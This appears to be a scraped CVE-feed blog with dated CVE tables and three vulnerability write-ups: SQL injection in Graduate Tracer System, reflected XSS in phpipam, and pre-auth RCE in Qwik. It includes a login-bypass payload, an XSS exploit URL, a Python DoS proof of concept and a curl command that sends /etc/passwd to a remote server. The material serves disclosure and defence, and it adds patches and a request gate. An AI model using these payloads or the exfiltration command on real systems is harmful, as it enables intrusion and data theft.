datetime subject id link
2023-03-18 00:00:05.272886 (WordPress, SQL injection) CVE-2023-1471 https://cve.report/CVE-2023-1471
2023-03-18 00:00:05.273781 (WordPress) CVE-2023-1470 https://cve.report/CVE-2023-1470
2023-03-18 00:00:05.274610 (XSS) CVE-2022-45817 https://cve.report/CVE-2022-45817
2023-03-18 00:00:05.275285 (XSS) CVE-2022-45814 https://cve.report/CVE-2022-45814
2023-03-18 00:00:05.276098 (XSS) CVE-2022-43461 https://cve.report/CVE-2022-43461
2023-03-18 01:00:03.379755 (PHP, SQL injection, Critical) CVE-2023-1475 https://cve.report/CVE-2023-1475
2023-03-18 01:00:03.380388 (PHP, SQL injection, Critical) CVE-2023-1474 https://cve.report/CVE-2023-1474
2023-03-18 01:00:03.455022 (WordPress) CVE-2023-1472 https://cve.report/CVE-2023-1472
2023-03-18 06:00:05.680116 (Kubernetes) CVE-2023-27593 https://cve.report/CVE-2023-27593
2023-03-18 07:54:04.238858 (Remote Code Execution, Laravel, PHP) CVE-2023-28115 https://cve.report/CVE-2023-28115
2023-03-18 07:54:04.239418 (Kubernetes) CVE-2023-27595 https://cve.report/CVE-2023-27595
2023-03-18 07:54:04.239972 (Command Injection, Arbitrary Command) CVE-2023-27253 https://cve.report/CVE-2023-27253
2023-03-18 14:00:03.263511 (Squid, XSS) CVE-2023-24278 https://cve.report/CVE-2023-24278
2023-03-18 19:00:02.658682 (PHP) CVE-2023-1481 https://cve.report/CVE-2023-1481
2023-03-18 19:00:02.659181 (PHP, SQL injection, Critical) CVE-2023-1480 https://cve.report/CVE-2023-1480
2023-03-18 19:00:02.659678 (PHP, Critical) CVE-2023-1479 https://cve.report/CVE-2023-1479
2023-03-18 20:00:02.867187 (Critical) CVE-2023-1484 https://cve.report/CVE-2023-1484
2023-03-18 20:00:02.867698 (SQL injection, Critical) CVE-2023-1483 https://cve.report/CVE-2023-1483
2023-03-18 20:00:02.868245 (PHP, Code Injection) CVE-2023-1482 https://cve.report/CVE-2023-1482

ref

Background

  • Graduate Tracer System is a system for managing student academic records.
  • An SQL injection vulnerability was found in Graduate Tracer System 1.0. The affected code is a function in the file admin/adminlog.php. When a user manipulates the parameter, SQL injection occurs. The attack can be carried out remotely, and the vulnerability allows access with administrator privileges and command execution. An exploit for the vulnerability has been made public.

Analysis

  • This program runs on phpstudy 8.1.1.3.
  • Vulnerability File: tracking/admin/adminlog.php
  • Vulnerability location: tracking/admin/adminlog.php user
  • The attack is possible by placing the payload in the user parameter sent at login (user=* [+] Payload:).

Test

  1. Open the administrator login page
  2. Enter the payload admin%27 '1'='1 in the ID field
  3. The vulnerability exists because no prepared statement is used and the parameter is dropped straight into the query string as a variable: sql = select * from xxx where user = 'admin' or '1'='1' and xxx
```php
<?php
include('dbcon.php');
session_start();
if (isset($_POST['submit'])) {
    $user = $_POST['user'];               // taken from the request unchanged
    $password = sha1($_POST['password']);

    // Vulnerable line: $user is concatenated straight into the SQL text
    $sql = "select * from adminuser where user = '$user' and password = '$password'";
    $result = mysqli_query($conn, $sql);
    if ($result->num_rows > 0) {
        $row = mysqli_fetch_assoc($result);
        $_SESSION['id'] = $row['id'];
        header("Location:homead.php");
    } else {
        echo "<script>alert('Mali!! ang iyong user o password na nalagay paki-ulit muli.')</script>";
    }
}
?>
```

Patch

  • No patch is provided
  • Switch to a prepared statement and redeploy
```php
// Bind the user-supplied values instead of concatenating them into the SQL text
$stmt = $conn->prepare("select * from adminuser where user = ? and password = ?");
$stmt->bind_param("ss", $user, $password);
$stmt->execute();
$result = $stmt->get_result();   // then continue with $result->num_rows as before
```
datetime subject id link
2023-03-17 01:00:03.375156 (Remote Attack) CVE-2023-27789 https://cve.report/CVE-2023-27789
2023-03-17 01:00:03.375726 (Remote Attack) CVE-2023-27788 https://cve.report/CVE-2023-27788
2023-03-17 01:00:03.376233 (Remote Attack) CVE-2023-27787 https://cve.report/CVE-2023-27787
2023-03-17 01:00:03.376771 (Remote Attack) CVE-2023-27786 https://cve.report/CVE-2023-27786
2023-03-17 01:00:03.377284 (Remote Attack) CVE-2023-27785 https://cve.report/CVE-2023-27785
2023-03-17 01:00:03.377797 (Remote Attack) CVE-2023-27784 https://cve.report/CVE-2023-27784
2023-03-17 01:00:03.378317 (Remote Attack) CVE-2023-27783 https://cve.report/CVE-2023-27783
2023-03-17 01:00:03.378834 (Remote Attack, PHP) CVE-2023-27711 https://cve.report/CVE-2023-27711
2023-03-17 01:00:03.379339 (Remote Attack, PHP, SQL injection) CVE-2023-27709 https://cve.report/CVE-2023-27709
2023-03-17 01:00:03.379859 (Remote Attack, PHP, SQL injection) CVE-2023-27707 https://cve.report/CVE-2023-27707
2023-03-17 01:00:03.380362 (Remote Attack) CVE-2023-27131 https://cve.report/CVE-2023-27131
2023-03-17 01:00:03.380876 (Remote Attack) CVE-2023-27130 https://cve.report/CVE-2023-27130
2023-03-17 01:00:03.381375 (Remote Code Execution, PHP) CVE-2023-27037 https://cve.report/CVE-2023-27037
2023-03-17 01:00:03.381894 (Remote Attack) CVE-2023-26769 https://cve.report/CVE-2023-26769
2023-03-17 01:00:03.455557 (Remote Attack) CVE-2023-26768 https://cve.report/CVE-2023-26768
2023-03-17 01:00:03.456167 (Remote Attack) CVE-2023-26767 https://cve.report/CVE-2023-26767
2023-03-17 02:00:03.599063 (GraphQL) CVE-2023-28104 https://cve.report/CVE-2023-28104
2023-03-17 02:00:03.599937 (Remote Code Execution) CVE-2023-27040 https://cve.report/CVE-2023-27040
2023-03-17 03:00:04.665399 (Docker) CVE-2023-28109 https://cve.report/CVE-2023-28109
2023-03-17 03:00:04.666091 (PHP, SQL injection) CVE-2023-27041 https://cve.report/CVE-2023-27041
2023-03-17 03:00:04.666687 (Kubernetes) CVE-2023-28110 https://cve.report/CVE-2023-28110
2023-03-17 06:00:05.259798 (Code Injection) CVE-2023-0598 https://cve.report/CVE-2023-0598
2023-03-17 07:00:04.967244 (XSS) CVE-2023-27494 https://cve.report/CVE-2023-27494
2023-03-17 07:00:04.969417 (Remote Code Execution) CVE-2022-43605 https://cve.report/CVE-2022-43605
2023-03-17 07:00:04.970018 (Remote Code Execution) CVE-2022-43604 https://cve.report/CVE-2022-43604
2023-03-17 07:00:04.970580 (sqlite) CVE-2022-43441 https://cve.report/CVE-2022-43441
2023-03-17 08:00:07.178085 (XSS) CVE-2023-27059 https://cve.report/CVE-2023-27059
2023-03-17 14:00:04.465122 (OpenSSH) CVE-2023-28531 https://cve.report/CVE-2023-28531
2023-03-17 17:00:05.775902 (PHP, SQL injection, Critical) CVE-2023-1455 https://cve.report/CVE-2023-1455
2023-03-17 17:00:05.776520 (SQL injection, Critical) CVE-2023-1454 https://cve.report/CVE-2023-1454
2023-03-17 17:00:05.777117 (Critical) CVE-2023-1453 https://cve.report/CVE-2023-1453
2023-03-17 17:00:05.777741 (Critical) CVE-2023-1452 https://cve.report/CVE-2023-1452
2023-03-17 17:00:05.855049 (Critical) CVE-2023-1444 https://cve.report/CVE-2023-1444
2023-03-17 17:00:05.855813 (PHP) CVE-2023-1442 https://cve.report/CVE-2023-1442
2023-03-17 17:00:05.856393 (PHP, SQL injection, Critical) CVE-2023-1441 https://cve.report/CVE-2023-1441
2023-03-17 17:00:05.857352 (PHP, SQL injection, Critical) CVE-2023-1440 https://cve.report/CVE-2023-1440
2023-03-17 17:00:05.858000 (PHP, SQL injection, Critical) CVE-2023-1439 https://cve.report/CVE-2023-1439
2023-03-17 18:00:05.672265 (PHP, Critical) CVE-2023-1460 https://cve.report/CVE-2023-1460
2023-03-17 18:00:05.673872 (PHP, SQL injection, Critical) CVE-2023-1459 https://cve.report/CVE-2023-1459
2023-03-17 19:00:04.374013 (PHP, SQL injection, Critical) CVE-2023-1461 https://cve.report/CVE-2023-1461
2023-03-17 19:00:04.374641 (SQL injection) CVE-2023-1152 https://cve.report/CVE-2023-1152
2023-03-17 21:00:06.073189 (GitHub) CVE-2023-1463 https://cve.report/CVE-2023-1463
2023-03-17 22:00:04.778266 (SQL injection, Critical) CVE-2023-1468 https://cve.report/CVE-2023-1468
2023-03-17 22:00:04.778911 (PHP, Critical) CVE-2023-1467 https://cve.report/CVE-2023-1467
2023-03-17 22:00:04.854546 (SQL injection, Critical) CVE-2023-1466 https://cve.report/CVE-2023-1466
2023-03-17 22:00:04.855390 (PHP, Critical) CVE-2023-1464 https://cve.report/CVE-2023-1464
2023-03-17 23:00:04.871377 (WordPress) CVE-2023-1469 https://cve.report/CVE-2023-1469
2023-03-17 23:00:04.872051 (WordPress) CVE-2023-1172 https://cve.report/CVE-2023-1172
datetime subject id link
2023-03-16 00:00:05.676810 (Apache Tomcat) CVE-2023-0100 https://cve.report/CVE-2023-0100
2023-03-16 00:00:05.677639 (SQL injection) CVE-2023-24732 https://cve.report/CVE-2023-24732
2023-03-16 00:00:05.678085 (SQL injection) CVE-2023-24731 https://cve.report/CVE-2023-24731
2023-03-16 00:00:05.678791 (SQL injection) CVE-2023-24730 https://cve.report/CVE-2023-24730
2023-03-16 00:00:05.679308 (SQL injection) CVE-2023-24729 https://cve.report/CVE-2023-24729
2023-03-16 00:00:05.679947 (SQL injection) CVE-2023-24728 https://cve.report/CVE-2023-24728
2023-03-16 00:00:05.754858 (SQL injection) CVE-2023-24726 https://cve.report/CVE-2023-24726
2023-03-16 01:00:03.095222 (SQL injection) CVE-2022-44580 https://cve.report/CVE-2022-44580
2023-03-16 02:00:03.060054 (PHP) CVE-2023-1418 https://cve.report/CVE-2023-1418
2023-03-16 02:00:03.060588 (PHP, SQL injection, Critical) CVE-2023-1416 https://cve.report/CVE-2023-1416
2023-03-16 02:00:03.061097 (PHP, Critical) CVE-2023-1415 https://cve.report/CVE-2023-1415
2023-03-16 02:00:03.061628 (PHP, SQL injection, Critical) CVE-2023-1379 https://cve.report/CVE-2023-1379
2023-03-16 02:00:03.062125 (XSS) CVE-2022-37402 https://cve.report/CVE-2022-37402
2023-03-16 04:00:04.571689 (nginx) CVE-2023-25804 https://cve.report/CVE-2023-25804
2023-03-16 04:00:04.572155 (Command Injection) CVE-2023-24229 https://cve.report/CVE-2023-24229
2023-03-16 06:00:06.078321 (XSS) CVE-2023-26912 https://cve.report/CVE-2023-26912
2023-03-16 07:00:06.163612 (Kubernetes, Critical) CVE-2023-26484 https://cve.report/CVE-2023-26484
2023-03-16 09:00:06.355160 (Remote Code Execution) CVE-2023-28461 https://cve.report/CVE-2023-28461
2023-03-16 09:00:06.356189 (Command Injection, Remote Attack) CVE-2023-28460 https://cve.report/CVE-2023-28460
2023-03-16 09:00:06.358310 (Command Injection) CVE-2023-1389 https://cve.report/CVE-2023-1389
2023-03-16 09:00:06.358937 (Arbitrary Command) CVE-2022-4313 https://cve.report/CVE-2022-4313
2023-03-16 11:00:05.857071 (XSS) CVE-2023-26951 https://cve.report/CVE-2023-26951
2023-03-16 11:00:05.857683 (Command Injection) CVE-2023-25280 https://cve.report/CVE-2023-25280
2023-03-16 12:00:07.555624 (PHP, SQL injection) CVE-2023-26784 https://cve.report/CVE-2023-26784
2023-03-16 12:00:07.556107 (Command Execution) CVE-2023-24795 https://cve.report/CVE-2023-24795
2023-03-16 12:00:07.556611 (Remote Attack) CVE-2023-24760 https://cve.report/CVE-2023-24760
2023-03-16 19:00:04.877055 (XSS) CVE-2022-40699 https://cve.report/CVE-2022-40699
2023-03-16 19:00:04.877582 (XSS) CVE-2022-38971 https://cve.report/CVE-2022-38971
2023-03-16 20:00:05.179500 (XSS) CVE-2022-41554 https://cve.report/CVE-2022-41554
2023-03-16 22:00:04.871453 (GitHub, XSS) CVE-2023-1429 https://cve.report/CVE-2023-1429
2023-03-16 22:00:04.872009 (Arbitrary Command) CVE-2023-24671 https://cve.report/CVE-2023-24671
2023-03-16 23:00:04.968759 (PHP, SQL injection) CVE-2023-27250 https://cve.report/CVE-2023-27250
2023-03-16 23:00:04.969330 (PHP) CVE-2023-1433 https://cve.report/CVE-2023-1433
2023-03-16 23:00:04.969910 (PHP, Critical) CVE-2023-1432 https://cve.report/CVE-2023-1432
2023-03-16 23:00:04.970505 (WordPress) CVE-2023-1431 https://cve.report/CVE-2023-1431

ref

Background

  • phpipam is an open-source web IP address management application.
  • In phpipam v1.5 a parameter vulnerable to reflected cross-site scripting was found. The parameter is closeClass, found in the /subnet-masks/popup.php endpoint.

Analysis

Test

  1. Log in
  2. After logging in, enter the attack code below as the URL
https://demo.phpipam.net/app/tools/subnet-masks/popup.php?closeClass="><script>alert("XSS")</script>

```php
<!-- footer -->
<div class="pFooter">
	<div class="btn-group">
		<!-- closeClass is read from the request and printed unencoded into the class attribute -->
		<button class="btn btn-sm btn-default <?php print @$_REQUEST['closeClass']; ?>"><?php print _('Close'); ?></button>
	</div>
</div>
```
  • When the attack code is submitted, the browser's response is as follows.
```html
<!-- footer -->
<div class="pFooter">
	<div class="btn-group">
		<button class="btn btn-sm btn-default "><script>alert("XSS")</script>">Close</button>
	</div>
</div>
```

Patch
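
The footer button from the analysis, rendered the vulnerable way beside a hardened way. This is an added example written in JavaScript, not phpipam's PHP and not a vendor patch: the allowlist regex, the attribute encoder and the countTags check are constructed here, and the only input used is the payload from the test above.

```javascript
// Added example, not phpipam's code. renderVulnerable() behaves like the PHP
// template above (closeClass printed straight into the class attribute);
// renderHardened() is a constructed fix that only accepts CSS class-name
// tokens and HTML-encodes the value before it lands in the attribute.

const TEMPLATE_PREFIX = '<button class="btn btn-sm btn-default ';
const TEMPLATE_SUFFIX = '">Close</button>';

// Equivalent of: <?php print @$_REQUEST['closeClass']; ?> (no encoding at all)
function renderVulnerable(closeClass) {
  return TEMPLATE_PREFIX + (closeClass ?? "") + TEMPLATE_SUFFIX;
}

// Attribute-context encoder: every character that can end a quoted attribute
// or open a tag is replaced by its entity.
function escapeHtmlAttr(value) {
  return String(value)
    .replace(/&/g, "&amp;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#39;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;");
}

// Constructed allowlist: one or more class tokens made of [A-Za-z0-9_-],
// separated by single spaces. Anything else is dropped rather than echoed.
const CLASS_LIST = /^[A-Za-z0-9_-]+( [A-Za-z0-9_-]+)*$/;

function renderHardened(closeClass) {
  const value = closeClass ?? "";
  // Validation rejects the payload outright; encoding is kept as a second
  // layer so the attribute stays intact even if the allowlist is loosened.
  const safe = CLASS_LIST.test(value) ? escapeHtmlAttr(value) : "";
  return TEMPLATE_PREFIX + safe + TEMPLATE_SUFFIX;
}

// Counts tag openers in the rendered markup. The template contributes exactly
// two (<button ...> and </button>); anything more means the attribute context
// was broken out of, which is what the reflected response above shows.
function countTags(html) {
  return (html.match(/<[A-Za-z/]/g) || []).length;
}
```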


datetime subject id link
2023-03-15 01:00:03.629320 (SQL injection) CVE-2023-27074 https://cve.report/CVE-2023-27074
2023-03-15 01:00:03.629865 (Critical) CVE-2023-1398 https://cve.report/CVE-2023-1398
2023-03-15 01:00:03.630307 (PHP) CVE-2023-1397 https://cve.report/CVE-2023-1397
2023-03-15 01:00:03.630776 (PHP) CVE-2023-1396 https://cve.report/CVE-2023-1396
2023-03-15 01:00:03.631229 (PHP) CVE-2023-1395 https://cve.report/CVE-2023-1395
2023-03-15 01:00:03.631665 (MySQL, PHP, SQL injection, Critical) CVE-2023-1394 https://cve.report/CVE-2023-1394
2023-03-15 01:00:03.632155 (Critical) CVE-2023-1392 https://cve.report/CVE-2023-1392
2023-03-15 01:00:03.632568 (PHP) CVE-2023-1391 https://cve.report/CVE-2023-1391
2023-03-15 02:00:03.310142 (XSS) CVE-2023-27070 https://cve.report/CVE-2023-27070
2023-03-15 02:00:03.310566 (XSS) CVE-2023-27069 https://cve.report/CVE-2023-27069
2023-03-15 03:00:04.001083 (Remote Code Execution) CVE-2023-24913 https://cve.report/CVE-2023-24913
2023-03-15 03:00:04.002028 (Remote Code Execution) CVE-2023-24907 https://cve.report/CVE-2023-24907
2023-03-15 03:00:04.002765 (Remote Code Execution) CVE-2023-24872 https://cve.report/CVE-2023-24872
2023-03-15 03:00:04.003239 (Remote Code Execution) CVE-2023-24869 https://cve.report/CVE-2023-24869
2023-03-15 03:00:04.003687 (Remote Code Execution) CVE-2023-24867 https://cve.report/CVE-2023-24867
2023-03-15 03:00:04.004528 (Remote Code Execution) CVE-2023-24909 https://cve.report/CVE-2023-24909
2023-03-15 03:00:04.004984 (Remote Code Execution) CVE-2023-24908 https://cve.report/CVE-2023-24908
2023-03-15 03:00:04.005456 (Remote Code Execution) CVE-2023-24876 https://cve.report/CVE-2023-24876
2023-03-15 03:00:04.005888 (Remote Code Execution) CVE-2023-24871 https://cve.report/CVE-2023-24871
2023-03-15 03:00:04.006270 (Remote Code Execution) CVE-2023-24868 https://cve.report/CVE-2023-24868
2023-03-15 03:00:04.006999 (SQL injection) CVE-2023-25206 https://cve.report/CVE-2023-25206
2023-03-15 03:00:04.007473 (Remote Code Execution) CVE-2023-23416 https://cve.report/CVE-2023-23416
2023-03-15 03:00:04.007902 (Remote Code Execution) CVE-2023-23415 https://cve.report/CVE-2023-23415
2023-03-15 03:00:04.008284 (Remote Code Execution) CVE-2023-23414 https://cve.report/CVE-2023-23414
2023-03-15 03:00:04.008644 (Remote Code Execution) CVE-2023-23413 https://cve.report/CVE-2023-23413
2023-03-15 03:00:04.009174 (HTTP.sys) CVE-2023-23410 https://cve.report/CVE-2023-23410
2023-03-15 03:00:04.009589 (Azure) CVE-2023-23408 https://cve.report/CVE-2023-23408
2023-03-15 03:00:04.010008 (Remote Code Execution) CVE-2023-23407 https://cve.report/CVE-2023-23407
2023-03-15 03:00:04.010382 (Remote Code Execution) CVE-2023-23406 https://cve.report/CVE-2023-23406
2023-03-15 03:00:04.010783 (Remote Code Execution) CVE-2023-23405 https://cve.report/CVE-2023-23405
2023-03-15 03:00:04.011189 (Remote Code Execution) CVE-2023-23404 https://cve.report/CVE-2023-23404
2023-03-15 03:00:04.011549 (Remote Code Execution) CVE-2023-23403 https://cve.report/CVE-2023-23403
2023-03-15 03:00:04.011969 (Remote Code Execution) CVE-2023-23402 https://cve.report/CVE-2023-23402
2023-03-15 03:00:04.012334 (Remote Code Execution) CVE-2023-23401 https://cve.report/CVE-2023-23401
2023-03-15 03:00:04.012688 (Remote Code Execution) CVE-2023-23400 https://cve.report/CVE-2023-23400
2023-03-15 03:00:04.013109 (Remote Code Execution) CVE-2023-23399 https://cve.report/CVE-2023-23399
2023-03-15 03:00:04.013773 (Remote Code Execution) CVE-2023-23392 https://cve.report/CVE-2023-23392
2023-03-15 03:00:04.014393 (Remote Code Execution) CVE-2023-21708 https://cve.report/CVE-2023-21708
2023-03-15 04:00:04.620937 (GraphQL) CVE-2023-27588 https://cve.report/CVE-2023-27588
2023-03-15 06:00:06.518784 (Command Injection, PHP) CVE-2023-28343 https://cve.report/CVE-2023-28343
2023-03-15 12:00:06.775986 (Remote Attack, PHP) CVE-2023-26511 https://cve.report/CVE-2023-26511
2023-03-15 12:00:06.776503 (File Upload) CVE-2023-26262 https://cve.report/CVE-2023-26262
2023-03-15 13:00:04.773870 (File Upload) CVE-2023-27757 https://cve.report/CVE-2023-27757
2023-03-15 15:00:04.972524 (PHP, File Upload) CVE-2023-27235 https://cve.report/CVE-2023-27235
2023-03-15 16:00:06.079322 (Command Injection) CVE-2023-27240 https://cve.report/CVE-2023-27240
2023-03-15 18:00:05.173922 (PHP, SQL injection, Critical) CVE-2023-1407 https://cve.report/CVE-2023-1407
2023-03-15 21:00:07.066053 (WordPress, Wordpress Plugin) CVE-2023-25708 https://cve.report/CVE-2023-25708
2023-03-15 22:00:04.554644 (XSS) CVE-2023-0322 https://cve.report/CVE-2023-0322

 


ref

https://cve.report/CVE-2023-1283

https://huntr.dev/bounties/63f1ff91-48f3-4886-a179-103f1ddd8ff8/

Background

In services that use Qwik (https://github.com/BuilderIO/qwik), a Node.js-based framework, pre-auth remote command execution is possible when the Qwik version is 0.20.1 or lower.

Analysis

  • The analysis was done on the vulnerable version, 0.20.1
  • Qwik's middleware request handlers are registered in the following order
    • POST: securityMiddleware ⇒ pureServerFunction ⇒ fixTrailingSlash ⇒ renderQData
    • GET: fixTrailingSlash ⇒ renderQData
```javascript
// packages/qwik-city/middleware/request-handler/resolve-request-handlers.ts
var resolveRequestHandlers = (serverPlugins, route, method, renderHandler) => {
  const routeLoaders = [];
  const routeActions = [];
  const requestHandlers = [];
  const isPageRoute = !!(route && isLastModulePageRoute(route[1]));

  if (serverPlugins) {
    _resolveRequestHandlers(
      routeLoaders,
      routeActions,
      requestHandlers,
      serverPlugins,
      isPageRoute,
      method
    );
  }
  if (route) {
    if (isPageRoute) {
      if (method === "POST") {
        requestHandlers.unshift(securityMiddleware);
        requestHandlers.push(pureServerFunction);
      }
      requestHandlers.push(fixTrailingSlash);
      requestHandlers.push(renderQData);
    }
    _resolveRequestHandlers(
      routeLoaders,
      routeActions,
      requestHandlers,
      route[1],
      isPageRoute,
      method
    );
    if (isPageRoute) {
      if (routeLoaders.length + actionsMiddleware.length > 0) {
        requestHandlers.push(actionsMiddleware(routeLoaders, routeActions));
      }
      requestHandlers.push(renderHandler);
    }
  }
  return requestHandlers;
};
```
  • The securityMiddleware function checks the following condition to prevent CSRF
    • request.headers.get("origin") == url.origin
```javascript
function securityMiddleware({ url, request, error }) {
  const forbidden = request.headers.get("origin") !== url.origin;
  if (forbidden) {
    throw error(403, `Cross-site ${request.method} form submissions are forbidden`);
  }
}
```
  • pureServerFunction runs ev.parseBody when all of the following conditions hold
  1. qfunc is defined in the query
  2. X-QRL in the header == qfunc in the query
  3. Content-Type == application/qwik-json
```javascript
async function pureServerFunction(ev) {
  const fn = ev.query.get(QFN_KEY); // var QFN_KEY = "qfunc";
  if (fn && ev.request.headers.get("X-QRL") === fn && ev.request.headers.get("Content-Type") === "application/qwik-json") {
    ev.exit();
    const qwikSerializer = ev[RequestEvQwikSerializer];
    const data = await ev.parseBody();
    if (Array.isArray(data)) {
      const [qrl, ...args] = data;
      if (isQrl(qrl) && qrl.getHash() === fn) {
        const result = await qrl.apply(ev, args);
        verifySerializable(qwikSerializer, result, qrl);
        ev.headers.set("Content-Type", "application/qwik-json");
        ev.send(200, await qwikSerializer._serializeData(result, true));
        return;
      }
    }
    throw ev.error(500, "Invalid request");
  }
}
```
  • In the SSR case this gives a DoS (PoC)
```python
import sys
import requests

# target base URL is taken from the command line; no body is sent
host = sys.argv[1]
headers = {"Origin": host, "X-QRL": "1", "Content-Type": "application/qwik-json"}
response = requests.post(f'{host}/q-data.json?qfunc=1', headers=headers)
print(response.text)
```
  • When the above conditions hold, execution proceeds inside ev.parseBody()
```javascript
function createRequestEvent(serverRequestEv, loadedRoute, requestHandlers, trailingSlash = true, basePathname = "/", qwikSerializer, resolved) {
	// skip
	parseBody: async () => {
      if (requestData !== void 0) {
        return requestData;
      }
      return requestData = parseRequest(requestEv.request, sharedMap, qwikSerializer);
    },
	// skip
}

// skip

var parseRequest = async (request, sharedMap, qwikSerializer) => {
  var _a2;
  const req = request.clone();
  const type = ((_a2 = request.headers.get("content-type")) == null ? void 0 : _a2.split(/[;,]/, 1)[0].trim()) ?? "";
  if (type === "application/x-www-form-urlencoded" || type === "multipart/form-data") {
    const formData = await req.formData();
    sharedMap.set(RequestEvSharedActionFormData, formData);
    return formToObj(formData);
  } else if (type === "application/json") {
    const data = await req.json();
    return data;
  } else if (type === "application/qwik-json") {
    return qwikSerializer._deserializeData(await req.text());
  }
  return void 0;
};
```
  • If requestData is undefined, the request is passed on to parseRequest
  • Because content-type is application/qwik-json, qwikSerializer._deserializeData is called
```javascript
// qwik/core.mjs
const _deserializeData = (data, element) => {
    const obj = JSON.parse(data);
    if (typeof obj !== 'object') {
        return null;
    }
    const { _objs, _entry } = obj;
    if (typeof _objs === 'undefined' || typeof _entry === 'undefined') {
        return null;
    }
    let doc = {};
    let containerState = {};
    if (element && isQwikElement(element)) {
        const containerEl = getWrappingContainer(element);
        if (containerEl) {
            containerState = _getContainerState(containerEl);
            doc = containerEl.ownerDocument;
        }
    }
    const parser = createParser(containerState, doc);
    reviveValues(_objs, parser);
    const getObject = (id) => _objs[strToInt(id)];
    for (const obj of _objs) {
        reviveNestedObjects(obj, getObject, parser);
    }
    return getObject(_entry);
};
```
  • This function creates a Parser for deserialization and calls reviveValues
  • The Parser has three functions: prepare, subs and fill
```javascript
const createParser = (containerState, doc) => {
    const fillMap = new Map();
    const subsMap = new Map();
    return {
        prepare(data) {
            // skip
        },
        subs(obj, subs) {
            // skip
        },
        fill(obj, getObject) {
            // skip
        },
    };
};
```
  • As shown below, reviveValues calls the parser's prepare function for every element of _objs whose type is "string" and whose value is not "\u0001"
```javascript
const reviveValues = (objs, parser) => {
    for (let i = 0; i < objs.length; i++) {
        const value = objs[i];
        if (isString(value)) {
            objs[i] = value === UNDEFINED_PREFIX ? undefined : parser.prepare(value); // UNDEFINED_PREFIX = "\\u0001"
        }
    }
};
```
  • prepare uses the first byte of the _objs value as a prefix and looks for a serializer with that prefix
  • If a matching serializer exists, it calls that serializer's prepare function with the value from the second byte onward as the first argument
```javascript
prepare(data) {
    for (const s of serializers) {
        const prefix = s.prefix;
        if (data.startsWith(prefix)) {
            const value = s.prepare(data.slice(prefix.length), containerState, doc);
            if (s.fill) {
                fillMap.set(value, s);
            }
            if (s.subs) {
                subsMap.set(value, s);
            }
            return value;
        }
    }
    return data;
}
```
  • The list of serializers is as follows; each one carries its own defined prefix
```javascript
// qwik/core.mjs
const serializers = [
    QRLSerializer,
    SignalSerializer,
    SignalWrapperSerializer,
    WatchSerializer,
    ResourceSerializer,
    URLSerializer,
    DateSerializer,
    RegexSerializer,
    ErrorSerializer,
    DocumentSerializer,
    ComponentSerializer,
    PureFunctionSerializer,
    NoFiniteNumberSerializer,
    URLSearchParamsSerializer,
    FormDataSerializer,
];
```
  • Of these, look at PureFunctionSerializer
```javascript
const PureFunctionSerializer = {
    prefix: '\\u0011',
    test: (obj) => typeof obj === 'function' && obj.__qwik_serializable__ !== undefined,
    serialize: (obj) => {
        return obj.toString();
    },
    prepare: (data) => {
        const fn = new Function('return ' + data)();
        fn.__qwik_serializable__ = true;
        return fn;
    },
    fill: undefined,
};
```
  • The prefix is \u0011, and the prepare function runs new Function on its argument
  • This makes remote command execution possible
    • The exploit is not public; please contact me separately.
    • command
      • curl -F "a=@/etc/passwd" http://[remote_server]
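
The request path traced above, condensed into a gate that runs before parseBody. This is an added example, not Qwik's code: it takes the three pureServerFunction conditions and the \u0011 PureFunctionSerializer prefix from the analysis, and the request-event shape (makeEvent), the sample bodies and the decision format are constructed here.

```javascript
// Added example, not Qwik's own code. It models the request path the analysis
// walks through: pureServerFunction's three conditions gate ev.parseBody(), and
// inside _deserializeData every string in _objs whose first byte is the
// PureFunctionSerializer prefix ("\u0011" per the analysis) reaches
// new Function. The gate below inspects a request before parseBody would run.

const QFN_KEY = "qfunc";                 // query key checked by pureServerFunction
const QWIK_JSON = "application/qwik-json";
const PURE_FUNCTION_PREFIX = "\u0011";   // PureFunctionSerializer.prefix (U+0011)
const UNDEFINED_PREFIX = "\u0001";       // reviveValues maps this value to undefined

// Constructed stand-in for the Qwik request event: case-insensitive header
// lookup, query as URLSearchParams, and the raw body text.
function makeEvent({ headers = {}, query = "", body = "" }) {
  const table = new Map(Object.entries(headers).map(([k, v]) => [k.toLowerCase(), v]));
  return {
    headers: { get: (name) => table.get(name.toLowerCase()) ?? null },
    query: new URLSearchParams(query),
    bodyText: body,
  };
}

// The three checks from pureServerFunction. Only a request passing all of them
// ever reaches ev.parseBody() and therefore _deserializeData.
function reachesPureServerFunction(ev) {
  const fn = ev.query.get(QFN_KEY);
  return Boolean(fn)
    && ev.headers.get("X-QRL") === fn
    && ev.headers.get("Content-Type") === QWIK_JSON;
}

// Walks the envelope the way _deserializeData/reviveValues do: _objs and
// _entry must exist, and each string element is dispatched on its first byte.
// Returns the index (and the source text that would reach new Function) of
// every element PureFunctionSerializer.prepare would be handed.
function findPureFunctionEntries(bodyText) {
  let obj;
  try {
    obj = JSON.parse(bodyText);
  } catch {
    return { valid: false, hits: [] };
  }
  if (typeof obj !== "object" || obj === null) return { valid: false, hits: [] };
  const { _objs, _entry } = obj;
  if (!Array.isArray(_objs) || _entry === undefined) return { valid: false, hits: [] };
  const hits = [];
  _objs.forEach((value, index) => {
    if (typeof value !== "string" || value === UNDEFINED_PREFIX) return;
    if (value.startsWith(PURE_FUNCTION_PREFIX)) {
      hits.push({ index, source: value.slice(PURE_FUNCTION_PREFIX.length) });
    }
  });
  return { valid: true, hits };
}

// Defensive gate to run ahead of parseBody (middleware or WAF rule). A qfunc
// call with a malformed envelope is refused too: the DoS PoC above is exactly
// such a request (no body at all) and already does damage on the SSR path.
function gateQwikRequest(ev) {
  if (!reachesPureServerFunction(ev)) {
    return { block: false, reason: "not a qfunc call; never reaches parseBody" };
  }
  const { valid, hits } = findPureFunctionEntries(ev.bodyText);
  if (!valid) {
    return { block: true, reason: "qfunc call with a malformed qwik-json envelope" };
  }
  if (hits.length > 0) {
    const where = hits.map((h) => `_objs[${h.index}]`).join(", ");
    return { block: true, reason: `PureFunctionSerializer prefix at ${where}` };
  }
  return { block: false, reason: "no function-prefixed entries" };
}
```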

Patch

datetime subject id link
2023-03-13 08:00:07.614784 (HashiCorp Vault) CVE-2023-24999 https://cve.report/CVE-2023-24999
2023-03-13 14:00:05.519906 (GitHub, SQL injection) CVE-2023-1361 https://cve.report/CVE-2023-1361
2023-03-13 14:00:05.520244 (GitHub) CVE-2023-1362 https://cve.report/CVE-2023-1362
2023-03-13 18:00:06.123354 (GitHub, Code Injection) CVE-2023-1367 https://cve.report/CVE-2023-1367
